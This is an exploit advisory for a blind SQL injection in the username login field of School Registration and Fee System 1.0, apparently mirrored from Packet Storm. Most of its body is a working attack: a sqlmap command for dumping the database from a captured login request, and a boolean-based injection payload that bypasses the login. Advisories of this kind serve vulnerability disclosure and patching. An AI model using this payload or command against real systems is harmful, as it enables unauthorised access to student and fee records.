School Registration And Fee System 1.0 SQL Injection ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 1st, 2021 📆 | 8146 Views ⚑

0

School Registration And Fee System 1.0 SQL Injection ≈ Packet Storm

# Exploit Title: School Registration and Fee System | 'username ' Blind SQL Injection 
# Exploit Author: Richard Jones
# Date: 01-04-2021
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

Step 1 - Capture login request
Step 2 - Run Command: sqlmap -r sql.txt --batch --risk 3 --level 3 -D bilal

parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=admin' OR NOT 7365=7365-- enST&password=asd

Source link

Tagged with:



Leave a Reply